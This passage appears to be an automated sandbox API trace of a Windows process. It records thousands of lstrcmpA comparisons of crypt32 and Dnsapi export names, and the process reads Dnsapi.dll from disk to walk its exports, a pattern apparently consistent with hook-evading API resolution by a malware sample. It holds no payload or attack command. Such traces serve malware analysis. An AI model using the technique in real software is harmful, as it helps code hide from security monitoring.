lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0139.133] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddRefServerOcspResponse") returned 1 [0139.134] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0139.134] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddSerializedElementToStore") returned 1 [0139.134] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddStoreToCollection") returned 1 [0139.134] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAlgIdToOID") returned 1 [0139.134] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertCloseServerOcspResponse") returned 0 [0139.134] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCRLContextToStore") returned 1 [0139.134] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCRLLinkToStore") returned 1 [0139.134] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCTLContextToStore") returned 1 [0139.134] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCTLLinkToStore") returned 1 [0139.134] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCertificateContextToStore") returned 1 [0139.134] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0139.134] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCRLToStore") returned 1 [0139.134] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCTLToStore") returned 1 [0139.134] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCertificateToStore") returned 1 [0139.134] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0139.134] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0139.134] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0139.134] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddRefServerOcspResponse") returned 1 [0139.134] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0139.134] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddSerializedElementToStore") returned 1 [0139.134] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddStoreToCollection") returned 1 [0139.134] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAlgIdToOID") returned 1 [0139.134] lstrcmpA (lpString1="CertCloseStore", lpString2="CertCloseServerOcspResponse") returned 1 [0139.134] lstrcmpA (lpString1="CertCloseStore", lpString2="CertCloseStore") returned 0 [0139.134] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCRLContextToStore") returned 1 [0139.134] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCRLLinkToStore") returned 1 [0139.134] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCTLContextToStore") returned 1 [0139.134] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCTLLinkToStore") returned 1 [0139.134] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCertificateContextToStore") returned 1 [0139.134] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCertificateLinkToStore") returned 1 [0139.134] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCRLToStore") returned 1 [0139.134] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCTLToStore") returned 1 [0139.135] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCertificateToStore") returned 1 [0139.135] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0139.135] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0139.135] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0139.135] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddRefServerOcspResponse") returned 1 [0139.135] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0139.135] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddSerializedElementToStore") returned 1 [0139.135] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddStoreToCollection") returned 1 [0139.135] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAlgIdToOID") returned 1 [0139.135] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertCloseServerOcspResponse") returned 1 [0139.135] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertCloseStore") returned 1 [0139.135] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertCompareCertificate") returned 0 [0139.135] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCRLContextToStore") returned 1 [0139.135] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCRLLinkToStore") returned 1 [0139.135] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCTLContextToStore") returned 1 [0139.135] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCTLLinkToStore") returned 1 [0139.135] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCertificateContextToStore") returned 1 [0139.135] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCertificateLinkToStore") returned 1 [0139.135] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCRLToStore") returned 1 [0139.135] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCTLToStore") returned 1 [0139.135] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCertificateToStore") returned 1 [0139.135] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0139.135] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0139.135] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0139.135] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddRefServerOcspResponse") returned 1 [0139.135] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0139.135] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddSerializedElementToStore") returned 1 [0139.135] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddStoreToCollection") returned 1 [0139.135] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAlgIdToOID") returned 1 [0139.135] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCloseServerOcspResponse") returned 1 [0139.135] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCloseStore") returned 1 [0139.136] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCompareCertificate") returned 1 [0139.136] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCompareCertificateName") returned 0 [0139.136] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCRLContextToStore") returned 1 [0139.136] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCRLLinkToStore") returned 1 [0139.136] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCTLContextToStore") returned 1 [0139.136] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCTLLinkToStore") returned 1 [0139.136] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCertificateContextToStore") returned 1 [0139.136] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCertificateLinkToStore") returned 1 [0139.136] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCRLToStore") returned 1 [0139.136] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCTLToStore") returned 1 [0139.136] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCertificateToStore") returned 1 [0139.136] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0139.136] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0139.136] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0139.136] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddRefServerOcspResponse") returned 1 [0139.136] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0139.136] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddSerializedElementToStore") returned 1 [0139.136] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddStoreToCollection") returned 1 [0139.136] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAlgIdToOID") returned 1 [0139.136] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertCloseServerOcspResponse") returned 1 [0139.348] GetProcessHeap () returned 0x430000 [0139.348] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4122040 | out: hHeap=0x430000) returned 1 [0139.356] GetProcessHeap () returned 0x430000 [0139.356] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x10) returned 0x449300 [0139.357] LoadLibraryA (lpLibFileName="Dnsapi.dll") returned 0x7ffc5a8a0000 [0139.364] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0139.364] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0139.364] GetModuleFileNameA (in: hModule=0x7ffc5a8a0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\Dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")) returned 0x1e [0139.364] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\Dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0139.364] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0139.365] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0139.365] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=686984) returned 1 [0139.365] GetProcessHeap () returned 0x430000 [0139.365] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0xa7b88) returned 0x3a9d010 [0139.366] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0139.366] ReadFile (in: hFile=0x17c, lpBuffer=0x3a9d010, nNumberOfBytesToRead=0xa7b88, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x3a9d010*, lpNumberOfBytesRead=0x14f5a4*=0xa7b88, lpOverlapped=0x0) returned 1 [0139.373] CloseHandle (hObject=0x17c) returned 1 [0139.373] lstrcmpA (lpString1="AdaptiveTimeout_ClearInterfaceSpecificConfiguration", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 0 [0139.374] lstrcmpA (lpString1="AdaptiveTimeout_ResetAdaptiveTimeout", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0139.374] lstrcmpA (lpString1="AdaptiveTimeout_ResetAdaptiveTimeout", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 0 [0139.374] lstrcmpA (lpString1="AddRefQueryBlobEx", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0139.374] lstrcmpA (lpString1="AddRefQueryBlobEx", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0139.374] lstrcmpA (lpString1="AddRefQueryBlobEx", lpString2="AddRefQueryBlobEx") returned 0 [0139.374] lstrcmpA (lpString1="BreakRecordsIntoBlob", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0139.374] lstrcmpA (lpString1="BreakRecordsIntoBlob", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0139.374] lstrcmpA (lpString1="BreakRecordsIntoBlob", lpString2="AddRefQueryBlobEx") returned 1 [0139.374] lstrcmpA (lpString1="BreakRecordsIntoBlob", lpString2="BreakRecordsIntoBlob") returned 0 [0139.374] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0139.374] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0139.374] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="AddRefQueryBlobEx") returned 1 [0139.374] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="BreakRecordsIntoBlob") returned 1 [0139.374] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="Coalesce_UpdateNetVersion") returned 0 [0139.374] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0139.606] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0139.606] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="AddRefQueryBlobEx") returned 1 [0139.606] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="BreakRecordsIntoBlob") returned 1 [0139.606] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="Coalesce_UpdateNetVersion") returned 1 [0139.606] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="CombineRecordsInBlob") returned 0 [0139.606] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0139.606] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0139.606] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="AddRefQueryBlobEx") returned 1 [0139.606] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="BreakRecordsIntoBlob") returned 1 [0139.607] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="Coalesce_UpdateNetVersion") returned 1 [0139.607] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="CombineRecordsInBlob") returned 1 [0139.607] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="DeRefQueryBlobEx") returned 0 [0139.607] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0139.607] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0139.607] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="AddRefQueryBlobEx") returned 1 [0139.607] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="BreakRecordsIntoBlob") returned 1 [0139.607] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="Coalesce_UpdateNetVersion") returned 1 [0139.607] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="CombineRecordsInBlob") returned 1 [0139.607] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="DeRefQueryBlobEx") returned -1 [0139.607] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="DelaySortDAServerlist") returned 0 [0139.607] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0139.607] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0139.607] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="AddRefQueryBlobEx") returned 1 [0139.607] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="BreakRecordsIntoBlob") returned 1 [0139.607] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="Coalesce_UpdateNetVersion") returned 1 [0139.607] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="CombineRecordsInBlob") returned 1 [0139.607] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="DeRefQueryBlobEx") returned 1 [0139.607] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="DelaySortDAServerlist") returned 1 [0139.607] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="DnsAcquireContextHandle_A") returned 0 [0139.607] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0139.607] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0139.607] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="AddRefQueryBlobEx") returned 1 [0139.607] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="BreakRecordsIntoBlob") returned 1 [0139.608] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="Coalesce_UpdateNetVersion") returned 1 [0139.608] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="CombineRecordsInBlob") returned 1 [0139.608] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="DeRefQueryBlobEx") returned 1 [0139.608] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="DelaySortDAServerlist") returned 1 [0139.608] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="DnsAcquireContextHandle_A") returned 1 [0139.608] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="DnsAcquireContextHandle_W") returned 0 [0139.608] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0139.608] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0139.608] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="AddRefQueryBlobEx") returned 1 [0139.608] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="BreakRecordsIntoBlob") returned 1 [0139.608] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="Coalesce_UpdateNetVersion") returned 1 [0139.608] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="CombineRecordsInBlob") returned 1 [0139.608] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DeRefQueryBlobEx") returned 1 [0139.608] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DelaySortDAServerlist") returned 1 [0139.608] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DnsAcquireContextHandle_A") returned 1 [0139.608] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DnsAcquireContextHandle_W") returned 1 [0139.608] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DnsAllocateRecord") returned 0 [0139.608] lstrcmpA (lpString1="DnsApiAlloc", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0139.608] lstrcmpA (lpString1="DnsApiAlloc", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0139.608] lstrcmpA (lpString1="DnsApiAlloc", lpString2="AddRefQueryBlobEx") returned 1 [0139.608] lstrcmpA (lpString1="DnsApiAlloc", lpString2="BreakRecordsIntoBlob") returned 1 [0139.608] lstrcmpA (lpString1="DnsApiAlloc", lpString2="Coalesce_UpdateNetVersion") returned 1 [0139.609] lstrcmpA (lpString1="DnsApiAlloc", lpString2="CombineRecordsInBlob") returned 1 [0139.609] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DeRefQueryBlobEx") returned 1 [0139.609] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DelaySortDAServerlist") returned 1 [0139.609] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DnsAcquireContextHandle_A") returned 1 [0139.609] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DnsAcquireContextHandle_W") returned 1 [0139.609] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DnsAllocateRecord") returned 1 [0139.609] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DnsApiAlloc") returned 0 [0139.609] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0139.609] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0139.609] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="AddRefQueryBlobEx") returned 1 [0139.609] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="BreakRecordsIntoBlob") returned 1 [0139.609] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="Coalesce_UpdateNetVersion") returned 1 [0139.609] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="CombineRecordsInBlob") returned 1 [0139.609] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DeRefQueryBlobEx") returned 1 [0139.609] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DelaySortDAServerlist") returned 1 [0139.609] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsAcquireContextHandle_A") returned 1 [0139.609] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsAcquireContextHandle_W") returned 1 [0139.610] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsAllocateRecord") returned 1 [0139.610] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsApiAlloc") returned 1 [0139.610] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsApiAllocZero") returned 0 [0139.610] lstrcmpA (lpString1="DnsApiFree", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0139.610] lstrcmpA (lpString1="DnsApiFree", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0139.610] lstrcmpA (lpString1="DnsApiFree", lpString2="AddRefQueryBlobEx") returned 1 [0139.610] lstrcmpA (lpString1="DnsApiFree", lpString2="BreakRecordsIntoBlob") returned 1 [0139.610] lstrcmpA (lpString1="DnsApiFree", lpString2="Coalesce_UpdateNetVersion") returned 1 [0139.610] lstrcmpA (lpString1="DnsApiFree", lpString2="CombineRecordsInBlob") returned 1 [0139.610] lstrcmpA (lpString1="DnsApiFree", lpString2="DeRefQueryBlobEx") returned 1 [0139.610] lstrcmpA (lpString1="DnsApiFree", lpString2="DelaySortDAServerlist") returned 1 [0139.610] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsAcquireContextHandle_A") returned 1 [0139.610] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsAcquireContextHandle_W") returned 1 [0139.610] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsAllocateRecord") returned 1 [0139.610] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsApiAlloc") returned 1 [0139.610] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsApiAllocZero") returned 1 [0139.610] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsApiFree") returned 0 [0139.610] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0139.610] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0139.610] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="AddRefQueryBlobEx") returned 1 [0139.610] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="BreakRecordsIntoBlob") returned 1 [0139.610] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="Coalesce_UpdateNetVersion") returned 1 [0139.610] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="CombineRecordsInBlob") returned 1 [0139.610] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DeRefQueryBlobEx") returned 1 [0139.610] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DelaySortDAServerlist") returned 1 [0139.610] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsAcquireContextHandle_A") returned 1 [0139.610] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsAcquireContextHandle_W") returned 1 [0139.611] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsAllocateRecord") returned 1 [0139.611] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsApiAlloc") returned 1 [0139.611] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsApiAllocZero") returned 1 [0139.611] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsApiFree") returned 1 [0139.611] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsApiHeapReset") returned 0 [0139.611] lstrcmpA (lpString1="DnsApiRealloc", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0139.611] lstrcmpA (lpString1="DnsApiRealloc", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0139.611] lstrcmpA (lpString1="DnsApiRealloc", lpString2="AddRefQueryBlobEx") returned 1 [0139.611] lstrcmpA (lpString1="DnsApiRealloc", lpString2="BreakRecordsIntoBlob") returned 1 [0139.611] lstrcmpA (lpString1="DnsApiRealloc", lpString2="Coalesce_UpdateNetVersion") returned 1 [0139.611] lstrcmpA (lpString1="DnsApiRealloc", lpString2="CombineRecordsInBlob") returned 1 [0139.611] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DeRefQueryBlobEx") returned 1 [0139.611] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DelaySortDAServerlist") returned 1 [0139.611] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsAcquireContextHandle_A") returned 1 [0139.611] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsAcquireContextHandle_W") returned 1 [0139.611] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsAllocateRecord") returned 1 [0139.611] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiAlloc") returned 1 [0139.611] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiAllocZero") returned 1 [0139.611] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiFree") returned 1 [0139.611] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiHeapReset") returned 1 [0139.611] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiRealloc") returned 0 [0139.611] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0139.611] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0139.611] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="AddRefQueryBlobEx") returned 1 [0139.611] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="BreakRecordsIntoBlob") returned 1 [0139.611] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="Coalesce_UpdateNetVersion") returned 1 [0139.611] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="CombineRecordsInBlob") returned 1 [0139.611] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DeRefQueryBlobEx") returned 1 [0139.611] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DelaySortDAServerlist") returned 1 [0139.611] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsAcquireContextHandle_A") returned 1 [0139.611] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsAcquireContextHandle_W") returned 1 [0139.611] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsAllocateRecord") returned 1 [0139.611] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiAlloc") returned 1 [0139.611] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiAllocZero") returned 1 [0139.612] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiFree") returned 1 [0139.612] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiHeapReset") returned 1 [0139.612] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiRealloc") returned 1 [0139.612] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiSetDebugGlobals") returned 0 [0139.612] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0139.612] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0139.612] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="AddRefQueryBlobEx") returned 1 [0139.612] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="BreakRecordsIntoBlob") returned 1 [0139.612] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="Coalesce_UpdateNetVersion") returned 1 [0139.612] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="CombineRecordsInBlob") returned 1 [0139.612] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DeRefQueryBlobEx") returned 1 [0139.612] lstrcmpA 